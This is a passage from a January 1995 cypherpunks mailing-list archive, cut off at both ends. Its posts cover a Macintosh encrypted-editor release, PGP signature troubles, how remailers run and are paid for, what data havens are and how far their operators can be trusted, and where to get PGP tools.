send it to the list, the signature doesn't verify again.

Tom


-----BEGIN PGP SIGNED MESSAGE-----



               RELEASE: secure edit beta 0.5 for Macintosh

Miyako Software has released an improved version of secure edit. It is
now available for FTP from ripem.msu.edu in the directory
pub/crypt/mac,
and at other ITAR-compliant sites. Finger tjbryce@amherst.edu for an
updated site list, as well as information on other products by miyako
software. All releases are signed with the Miyako Software public PGP
key.

Version b0.5 sports the following new features:

FOR EASE OF USE AND UTILITY:
* extensive balloon help
* an undo command
* print command
* a find command (useful for storing sensitive information with secure
edit)
* windows menu with tile and stack commands
* copy with line breaks inserted, for composing email or pgp messages
* much better and faster compression and a smaller base file size
* secure edit now uses Colin Plumb's fast 68k assembly IDEA
implementation
* you can turn off the annoying  marks
* the menu blinking clunky has been fixed
* the window update annoyance has been fixed
* various interface clunkies have been fixed
* new and more intuitive icons have been drawn

FOR SECURITY:
* much better random number management using the code written by Colin
Plumb for PGP
* random data is snarfed from all events the application observes
(such as your keystrokes), the time these events occur, and by
continuously tracking your mouse position, even when backgrounded. the
pool of random data is maintained between sessions and is encrypted
based on these random events before it is written to disk and before
use.
* so that every file is encrypted on a different IDEA key, making
cryptanalysis of one useless agaist others, your key is salted with 128
bits of random data, stored in the clear for decryption, to make a
'session key'. thus, the key used to encrypt every file will be
different, even if you used the same passphrase. this makes
cryptanalysis of one file useless against others.
* the salt is concatenated with MD5[passphrase] many times and this
concatenated string hashed to generate the 'session key' for the file
from your pass phrase. The number of times it is concatenated is
calibrated to make it take about half a second - not a big performance
loss, but it makes brute force attack of weak passphrases up to
thousands of times more costly.
* semi-splay compression is utilized, which is faster than the lame
old compression (written by me :( ) and which gets >50% file reduction.
It strengthens the encryption by reducing the redundancy in the
plaintext. It also continually modifies the compression encoding system
based on the data as it goes along, making the interpretation of
compressed data dependent on the data that has come before it
* you can verify keys against Curve Encrypt keyfiles
* documents that are saved in plaintext format clearly distinguished
by "TEXT:" in the window title
* the source code has been cleaned up :-) and much improved to make it
easier to verify yourself that the program is strong and secure.

                           ------THE BASICS------
                           (from version a 0.3.4)

SECURE EDIT is an editor designed for editing sensitive text buffers.
It is designed to prevent plaintext from ever being written to disk,
even if only momentarily. You might fail to overwrite or encrypt such
plaintext properly, or your opponent might be able to retrieve some of
the information even though you wiped it (see docs for details). Word
Processors generally create temp and scratch files that leave plaintext
on your drive whether you like it or not. Secure edit fixes this
problem. Sometimes you need to quit in a hurry and have all your data
encrypted and saved. Or you might prefer to have your files encrypted
at
all times so that you never forget to re-encrypt a file you worked on,
and so that files are never in plaintext form while you are working
with
them. Secure edit sports the following features to serve these and
other
data security needs:

* Plaintext is never written to disk - Secure Edit locks all sensitive
buffers in memory so that virtual memory will never swap them to disk.
This includes the text you are editing as well as any encryption keys
in
use.

* Secure Edit never creates plaintext temp or scratch files

* Secure Edit offers the option of saving files directly in encrypted
format so you never have plaintext on the hard drive.
  
* Your data is compressed and encrypted in RAM with the IDEA
algorithm, then written to disk in encrypted format.
  
* Secure Edit can mantain a secure, private clipboard, interconverting
with the system clipboard only when you use OPTION-cut,copy, and paste.
This prevents the system from getting a copy of your sensitive data and
possibly writing it to disk, or leaving it around for another user to
see.
  
* Secure Edit can open foreign text files, and DOD wipe them on
request when you save the file in encrypted format.
  
* Secure Edit offers a default passphrase option so you only need to
enter your passphrase once. It also offers the option of validating
your
phrase against secure validation information that can be used to check
that you have entered your standard pass phrase, but which cannot be
used to recover the passphrase. This prevents you from saving under a
bad passphrase and losing data.
  
* Secure Edit offers a time-out option, whereby it will save all files
and quit after a certain idle time period
  
* Secure Edit offers an option-quit feature, whereby it will assume it
is okay to save all files, and save and quit as quickly as possible
  
* Secure Edit is available to U.S. citizens in the U.S. at an
ITAR-compliant site near you. I'm presently uploading it to
ripem.msu.edu and others.

* source code is, of course, available.
 
* Questions about Secure Edit should be directed to me, at
<tjb@acpub.duke.edu>

Thanks for your attention.

Tom Bryce

/////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*---------------------------------------------------------*
Miyako Software is dedicated to creating freeware to help
make computers tools of personal liberation and expression.
for product info and PGP key, finger <tjbryce@amherst.edu>
                email: <tjb@acpub.duke.edu>
*---------------------------------------------------------*
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_/////////////////////////////


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxX0v08YjrUhOUC5AQE/UwP/eLKniLvJhYm1b1RZf0/0qY3mBUfhIMeT
R/ozIURiOD/qnfmn6Un9BAVvEBiVxivj8z6J2ByOREGO1ZYgpO1kZcEu0tZoP0eo
4fGeg652BYRqk4+Ltw3XcV1nDfudukAOoT9waiub1JsPeNDP/DuM+yt05gPNplNV
UMToRWfMgaM=
=T/QC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 12 Jan 95 20:58:31 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: time stamping service (again)
In-Reply-To: <Pine.SUN.3.91.950112062429.3862C-100000@eskimo.com>
Message-ID: <m0rSZSa-0009v8C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> My PGP based time stamping service is back online.  I took it 
> down a while ago thinking the folks at notary.com (Digital 
> Time-Stamp, Inc.) were going to release their commercial 
...

This is elegant and great...

Why don't we add to the todo list the following:

Let's package up a number of the self-contained services, code, etc.
into a bundle that can be installed all at once (say on a Linux
system :-) ) and call it the 'CypherStation' release.

We can try to reach a concensus for standard service naming/access
methods and create a federation of these things.

It should have minimize bandwidth, minimize cpu, minimize storage
levels of service to allow different levels of users to have
different possible impact on the machine.  (Ie. : local, paying,
regional, unknown, domain, etc.)

I know that those of us running Internet services would devote
a little of our imaginary free time.

We could have a string to identify available services and versions:
CypherStation/.01/Serv:RTAmAh1.3  Where each service could have 
versions that differed from the release.

Just some raw thought.

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant      510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua M. Sled" <jsled@eis.calstate.edu>
Date: Fri, 13 Jan 95 00:25:06 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Remailer@jpunix.com down!!!???
In-Reply-To: <V5Z5lKjqRuNT077yn@mirage.skypoint.com>
Message-ID: <Pine.3.89.9501130030.A28258-0100000@eis.calstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Jan 1995, Samuel Kaplin wrote:

> I just read that the remailer at jpunix.com went down suddenly and
> permanently. Anyone know what happened?? I also believe the whole site is
> down as it didn't answer my pings a couple of days ago.

He was getting spam from AOL at the rate of 25 messages every 5 
seconds... so he took the system down.

Joshua M. Sled <jsled@free.org/jsled@ctp.org>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:53:06 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
Message-ID: <ab3935ef000210047747@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Pierre Uszynski writes:
>Doug Barnes said:
<SNIP>
>Same here, but from the other tack: "Remailer Guild??? Give me a
>break :-)" My problem with the idea of "Guild" (or any quasi
>general agreement) of remailer operators is that:
>
>On the one side:
>- The whole idea of a using a remailer chain comes from distrust of
>the operators. The operators should be the ones to distrust each other
>the most.

I agree. There should be minimal cooperation between remailer operators.
They should work together on standards and policies to ensure the free flow
of messages.  They should not be afforded an oportunity to conspire.

<SNIP>
>Pierre.
>pierre@shell.portal.com

Observation:
Most complaints to remailers come from news posts. Only a small fraction from
direct mail. (Is this the experience of the other operators?)

Suggestion:
Pay the first and last remailers in the chain.
The first remailer knows who you are. You simply
purchase an account from him. He provides support and
user friendly utilities...
Block all posts from normal remailers.
News posts only allowed from pseudonym servers like omega.c2.org.
The user uses e-cash, or greenbacks in an envelope, to buy an
account on the nym server.

All email from other remailers, and to any address is free.

Thoughts?
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxOHzVVkk3dax7hlAQGnfQP9HJG+O/L/+L9hGqZ6xYqfmJh30Kwli7r6
BTEck7NwJ1W3gk6IpLy+NG4l/v8HCEyWvQGHYsGcBJkl+y6i2otb8Y6Bec25xntZ
KlfwNi6UON5rpnP8+EFolcolfb9OpEIMhfirzu07jVkM72mUBp7IAzFZjZ2NTUY+
oLDCa0V2EWg=
=0TTW
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:53:11 PST
To: Jurgen Botz <cypherpunks@toad.com
Subject: Re: Remailer postage
Message-ID: <ab393fa201021004be3f@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>jpb@gate.net wrote:
>> Where can I get the Magic Money software?
>
>I'm a bit behind, so sorry if others have already suggested this, but
>you should need any digicash for this... stamps can be just big random
>numbers.  Someone buys a books of stamps, you make 10 big random
>numbers send them a copy and keep a copy on file.  After a message
>comes through with a particular number you throw that number out.
>
>Just like real stamps, and unlike money, they can be used only once.

However I now can recognize which messages are yours. If I work with
another operator, I can eliminate all the remailers between us for purposes
of traffic analysis.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxOPhFVkk3dax7hlAQEy7AP+NZOV8cZ94VfInTy5RHKasPOxrmBzcy9k
Bc1nqyK95ae4mr+XWNBBpqjL4FQBwTpnSVI+eVAnTd9QWK9XND3YN8M9PdzzM8zF
qdrB4I7aB29AJsenQWD1zujZDNLwMaaRxDYe47xR5vD+o7LIUMHxBvveLllp0pAM
Ek2wjwQhezI=
=PsFM
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:54:17 PST
To: cypherpunks@toad.com
Subject: Re: Remailer source
Message-ID: <ab39403202021004e041@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


>Octavian  Ureche <tavi@info.polymtl.ca> wrote:
>
>> Does anybody know where could I find UNIX sources
>> for a remailer ?
>

Try mixmaster. I can not post the path for export reasons. Mail me if you
want it. It runs on Sparc. Does not run on Linux and FreeBSD. All others
unknown.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Fri, 13 Jan 95 00:04:29 PST
To: cypherpunks@toad.com
Subject: Remailer@jpunix.com down!!!???
Message-ID: <V5Z5lKjqRuNT077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



I just read that the remailer at jpunix.com went down suddenly and
permanently. Anyone know what happened?? I also believe the whole site is
down as it didn't answer my pings a couple of days ago.

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
             A man without a God is like a fish without a bicycle.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxYycclnXxBRSgfNAQFh8wf9HR9KCppQV5Li70ggDPQ0hTEuUU6Cl3BS
m0N4Mx/6bu3OWIyh5XkpBfNSNhvixkSR7UJ2LtqugXAxsfYiYQw+uw2vd1i3rK8k
VYuqWYgWh8uu+xNIoTXN7MdosuGoG/+eglVWW5SuZNxpVO5ggVq7KqDjTTtHjpSC
TPBwJbSELoMIQbcFfvbA5EgaMVqdVbf1xXxUVLIguh0AreX75gPMPVPzwS9+xOMs
BgB/UgsC+XGWYhCH7EjiAF0tPE+MBRkVkQVfCEo1Hk9CrafMUHYIWPzwu/sirq3v
vhoZxurEYA6Fr2sbCOtlPGXKv3UAELmU+h7b+vO4CKu6OCn1XhgZmg==
=uFxE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Fri, 13 Jan 95 00:02:25 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <199501121637.IAA00893@largo.remailer.net>
Message-ID: <Pine.3.89.9501130154.B28998-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Eric Hughes wrote:

>    why would you give the haven owner free run?  I mean naturally he does 
>    have free run with your data once he gets it, 
> 
> That's exactly the reason, namely, to make the agreement between
> individuals match the underlying nature of information.  This is
> different in the trust in silence about the user.  This is also not to
> say that the operator can't undertake to make assurances about where
> bits go and don't go.
>
are you saying that there is an agreement between the data haven operator 
and the user?  If so, that's one of the things i was attmeting to point 
out in that reply.  I think the agreement, wether it is a contract, not 
likely, or a sense of trust is extremely important to the data-haven.
 
>    I am sure you 
>    woudln't want your data stored ona  public access Unix system, or in 
>    plaintext.
> 
> So don't store it in plaintext.  The operator of the data storage
> facility has no responsibility for this.
> 
Right now were are getting into so many fraggin different definitions of 
data haven, that this conversation is loopng over itself infinetly.  In 
one sort of data Haven, the operator does have a responsibility to keep 
the data private, yet on another, he doesn't have th responsibility, it 
all depends on what the aims and views and golas of the DataHaven are.  
And since we have not yet agreed on what a data Haven.....we get usenet 
run-around.  

>    if the datahaven is turned into a data broker
> 
> I don't know about you, but I don't like paying money for random bits.
> 
this is ties into the above line, maybe you arent just sending encrypted 
data, maybe your selling secrets to a datahaven operator, who is 
offshore, or who has the money ot pay you know, and also the structre set up 
to recieve, transmit, and take payment and pay for that secret data, or 
valuable info.  Once again I think that we are working with multiple 
definitions of DataHaven here, adn it is leading to confusions.

>    well what would be thepurpose of this data haven you propose except as a 
>    extra storage pace for data, like if you dont have space on your own 
>    drive?
> 
> Even when you've got enough of your own disk space, it's still subject
> to failure.  Putting data in multiple places reduces the possibility
> of unrecoverable catastrophe.
> 
ther are already services much better equipped to deal with this problem, 
although, I am unsure if any of them are crypto-aware as of yet.  Osmthig 
to look into.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Fri, 13 Jan 95 00:13:56 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <ab3b21760302100490ca@[132.162.201.201]>
Message-ID: <Pine.3.89.9501130117.C28998-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Jonathan Rochkind wrote:

> At 4:30 AM 01/12/95, Nesta Stubbs wrote:
> You shouldn't ever give the operator the info in plaintext. Encrypt it,
> public or otherwise, and distribute the key to your Band of Merry Men.
> Then it doesn't matter even it's sitting on a public access Unix system, no
> one can read it anyhow.  The main point of this kind of data haven seems to
> be providing you a remote location to store your data, in an anonymous way,
> so even if it does end up being found out, you can't be linked to it.  I
> wouldn't trust the operator to do anything particular with the data other
> then keep it safe enough so I can retrieve it later, and I'd take the
> neccesary precautions to account for that lack of trust. The only reason
> I'd trust him to even keep it safe for me, is because of reputation market.
> If he routinely loses people's data, word is going to get around. On the
> other hand, if he routinely shows people's data to the FBI, no one is even
> going to know about it. I don't trust him not to routinely show the data to
> the FBI, or store it in public.  Use encryption.
>
first note that in carol ann's post she previously said it doesn't matter 
to her how the data is transported, and thus it could be in paintext, I 
made.  and also that she said that the operator should be able to specify 
how it was transmitted.

once again we're running with different definitions of data haven.  I see 
the ata haven as more than just aplace to safely store data if it's 
encrypted, I see it capabel of alot of other things, like acting as a 
central point to  BlackNet type operation, with the proper structure set 
up to carry out the transactions with safety, or relative safety.  also, 
as a anonymous drop box type of place, I can then send my encrypted data 
to the data haven, and let them hold it until some anonymous client or 
eployer and I complete an agreed upon contract and both give word to the 
data haven to complete it's aprt of the contract, wether it is allowing 
the other person to now access that encrypted information, or doing a 
monetary transaction with net-cash or whatever.  Also, as a data base of 
illegl information, like old credit records and such.

> Of course there are different purposes for data havens, which would require
> more trust of the operator.  But I'm not sure how well those are ever going
> to work, because I'd much rather trust my encryption then trust the
> operator.
>
agreed. there are also other operations besides data storage that can be 
protected by your own crypto, and only use the data haven as a mid-point.

argh, I'm sorry fo the poor typing in this letter, and the other one i 
sent to Eric ont his subject, it's really late and I am dogged, just got 
done 9 hours of work.  BUt this topic is so interesting for me I couldnt 
resist.  Tommorow if I get a chance I will atttempt to outline what *I* 
think of when I am saying data haven, maybe it will help us be more 
productive, not that we arent doing that now...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 23:11:35 PST
To: cypherpunks@toad.com
Subject: signature business for secure edit release announce
Message-ID: <v01510104ab3bd86b254f@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


I'm not going to waste any more bandwidth sending the announcement (sorry),
but here's how you can validate the signature if you'd like to.

If you'd like to verify the signature on the announcement for secure edit,
please finger me at tjbryce@amherst.edu. In my plan is contained the
announcement with a valid signature from Miyako Software's public key.

Even though I had "treat source file as text" selected, I think there must
have been left over some weird character in there that is not transmitted
through email properly. What I did to get the signature to validate was
place the announcement in my plan at amherst.edu, finger myself, copy the
signed announcement, detach the invalid signature with mac pgp, sign the
leftover text and copy just the resulting signature, log back onto amherst,
and I edited the plan.txt file, pasting the new signature onto where the
old signature used to be. FINALLY WORKED!

Sincere apologies for using THREE TIMES the bandwidth the message actually
needed, and not even getting it to work at that. Thanks to Bill Evans for
checking out the signature and noticing it was invalid.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 12 Jan 95 23:44:32 PST
To: crunch@well.sf.ca.us (John Draper)
Subject: Re: Some PGP problems
In-Reply-To: <199501130551.VAA01278@well.sf.ca.us>
Message-ID: <199501130743.CAA24613@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	There are two versions of MacPGP that use RSAREF, and are thus
legal & kosher, plus Viacrypts.  The free ones are MIT, and 2.6.2ca.
The MIT one doesn't support Apple Events.  The Apple event supporting
PGP's can be driven by a menu interface called the MacPGP kit. 2.3 is
not fully compatible with 2.6; I use 2.6.2 with the kit.

MIT: telnet net-dist.mit.edu, login as getpgp
server.netcom.com:/pub/gr/grady/PGP/MacPGP262b1.2.sea.hqx.asc)
duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPKit.hqx

	You were supposed to use gunzip (GNU's unzip) to unzip, but
Stufit deluxe will handle it; just tell Stuffit its a zipped file.

Crunch asked:

| I learn that Mac PGP2.3 exists,  but NO version 2.6
| exists for the Mac.   Is that true?    If not,  then
| where can I get a copy,  so I can decode a message
| created with 2.6?    If ver 2.3 will decode a message
| encoded with 2.6,  then I'm faced with how I can
| extract this Mac file which has a .gz extension.
| Binhex don't seem to decode it.  So,  I now got this
| file named "macpgp2.3.cpt.hqx.gz" on my Mac.    Was
| I supposed to have used some special UNIX itility to
| convert the .gz thingie first?    Please emlighten
| this confused cypherpunker!!! :-)   Or will I even have
| to do all of this because 2.3 is incompatable with 2.6.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Fri, 13 Jan 95 06:12:09 PST
To: cypherpunks@toad.com
Subject: Windows Eudora PGP/remailer add-on
Message-ID: <199501131412.AA12078@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm working on a pre-mailer/PGP shell that works with Eudora for Windows.
You compose the mail in the shell, encrypt it, specify remailer(s), and it
transfers the message back to Eudora.

It's called Private Idaho.  Anonymous FTP from ftp.eskimo.com
/joelm/pidaho11.zip.

There were some problems with the loading routine in version 1.0, but
hopefully I've fixed them in this version.

Any comments, requests, bug reports appreciated.

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael L. Acklin" <hroller@metronet.com>
Date: Fri, 13 Jan 95 05:23:39 PST
To: marko@millcomm.com
Subject: PGP and Windows
Message-ID: <Pine.HPP.3.90.950113071701.27484A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark,
	I saw your message on Cypherpunks List and noticed that you were 
using WinEudora. My question is do you know of a program that will do 
encryption with PGP on the fly within Windows. 
	I know how to encrypt a file and attach it to a message. And I 
have both WinPGP 2.6 and WinPGP 1.0. Both only encrypt files. Any help 
would greatly be appreciated. Thanks in Advance....

Mike Acklin  ---------------> hroller@metronet.com
Pub Key available at MIT Key Server.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Fri, 13 Jan 95 07:06:19 PST
To: "Joshua M. Sled" <jsled@eis.calstate.edu>
Subject: Re: Remailer@jpunix.com down!!!???
In-Reply-To: <Pine.3.89.9501130030.A28258-0100000@eis.calstate.edu>
Message-ID: <199501131505.JAA05109@jpunix.com>
MIME-Version: 1.0
Content-Type: text/x-pgp


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9501130030.A28258-0100000@eis.calstate.edu> you write:
>On Fri, 13 Jan 1995, Samuel Kaplin wrote:
>
>> I just read that the remailer at jpunix.com went down suddenly and
>> permanently. Anyone know what happened?? I also believe the whole site is
>> down as it didn't answer my pings a couple of days ago.
>
>He was getting spam from AOL at the rate of 25 messages every 5 
>seconds... so he took the system down.
>
>Joshua M. Sled <jsled@free.org/jsled@ctp.org>

The remailer is gone but jpunix is up. I took it down for about half a
day a couple of days ago to massage the filesystems. The keyserver is
alive and well and open to public use.

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxaWpFOTpEThrthvAQEy6QP/b0d3UB8gnrfDaDpGjajfqipDWcpR4Xyr
IMCjg1X5xqmEe7mmX2EeQSUqR/0QudzoD0N1/Xx4tcMGZp4k8jePQaY8XL/Xbs1j
7mtBiFBuyLQ0Rbv73mv7maNu7qsUGiy2v9/wJGoNtcpRTDJKj/8Mf/68jU6wTITj
1/JXZ9H3M94=
=55y/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 09:48:25 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501122233.OAA02325@ix3.ix.netcom.com>
Message-ID: <199501131746.JAA02913@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

   Paco begins by 
   inventing the new [format] of which only Paco knows the internals.

Fine.  The operator has no idea of how to make sense of this data
format.  Just because someone in the world has an interpretation for
it doesn't mean that I do.

No operator of any data service can be expected to know about every
data interpretation.  The key here is "good faith".  An operator can
undertake a good faith effort to remain ignorant about content.

The argument that "it passed the filter, so it's approved" is bogus.
The counter is that "it passed the filter, so I personally have no
idea what's inside it."  Knowledge here is personal specific
knowledge, not an acknowledgement of a possibility.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 09:51:59 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm) (fwd)
In-Reply-To: <v01510104ab3b6305a759@DialupEudora>
Message-ID: <199501131750.JAA02922@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: rah@shipwright.com (Robert Hettinga)

   Eric, what'll you take for "remailer.net"? ;-).

Addresses under remailer.net will be available to operators of
approved remailers.  Approved is yet to be defined, so no one could
possibly satisfy the conditions for it yet.

In the meanwhile, I'm using as a vanity license plate.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 09:54:19 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <v02110100ab3b6fb73f29@[129.219.97.131]>
Message-ID: <199501131752.JAA02925@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ben.Goren@asu.edu

   Here's a solution:

What problem, pray tell, does this solve?  It seems far more
complicated than it need be.

   Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
   sends to Dave a secure hash of the file, a key with which to decrypt it,
   and a handful of plaintext at the beginning of the file. Dave decrypts the
   file that matches the hash with the key Alice gave him; if the file begins
   as Alice says it should, Dave returns the file to Alice.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 10:02:18 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501130137.AA03281@eri.erinet.com>
Message-ID: <199501131800.KAA02934@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:
   > ... Seems to me that a quite reasonable condition of use of a remailer is
   >that what is passed isn't human readable.

   From: pstemari@erinet.com (Paul J. Ste. Marie)

   Perhaps I missed this, but why?  If someone is going to plant
   kiddie porn or whatever on you, does it really matter if they
   encrypt it first or not?

If you can't read it, it's not kiddie-porn *for you*, although it
might be for someone with the key.

Encryption fragments meaning subjectively.  A magazine, for example,
has a fixed center of meaning for all who can read the language.  A
magazine looks the same to all who look at it.  An encrypted file
looks different to those who have the key from those who do not.

Encrypted data is fundamentally different from paper-and-ink data in
this way.  The metaphor of "planting it on somebody" does not apply to
data that the "somebody" can't read.

   I forget the name of the cypher (Vigere, perhaps--the one that uses
   a series of Caesar-like cyphers keyed by a password), but you could
   just run it through that with a password of
   abcdefghijklmnopqrstuvwxyz and you'd flatten out the distribution
   enough to get it by casual inspection.

Fine.  It think that would suffice.  If you can't easily read it, you
can't be expected to have read it.  The operator of a data service has
_zero_ motivation to cryptanalyze something.  If they happen to apply
a viewer to the file (for whatever reason), they don't _want_ to see
what's inside.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 10:09:41 PST
To: cypherpunks@toad.com
Subject: Re: essential characteristics of a Data Haven
In-Reply-To: <Pine.NXT.3.91.950112180625.3304B-100000@kisa>
Message-ID: <199501131807.KAA02940@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Adam Feuer <adamfast@seanet.com>

   what differentiates a "data haven" from "reasonably secure offsite
   storage"?

Right now, that's easy.  Data havens don't exist, and prototype code
for reasonably secure off-site storage does.

The key distinguishing feature of off-site storage is that it stores
data only as bits, structured and segmented, but not interpreted _as_
anything but bits.  A data haven, on the other hand, holds things that
someone disapproves of, otherwise there's no need for a haven.  _A
fortiori_, if someone disapproves of it, it must mean something.  Raw
bits don't mean anything, or rather, they can mean everything.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 10:14:13 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501130333.QAA03633@akeake.its.vuw.ac.nz>
Message-ID: <199501131811.KAA02946@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Paul Foley <Paul.Foley@vuw.ac.nz>

   NZ Telecom are conducting an experiment with using phonecards in
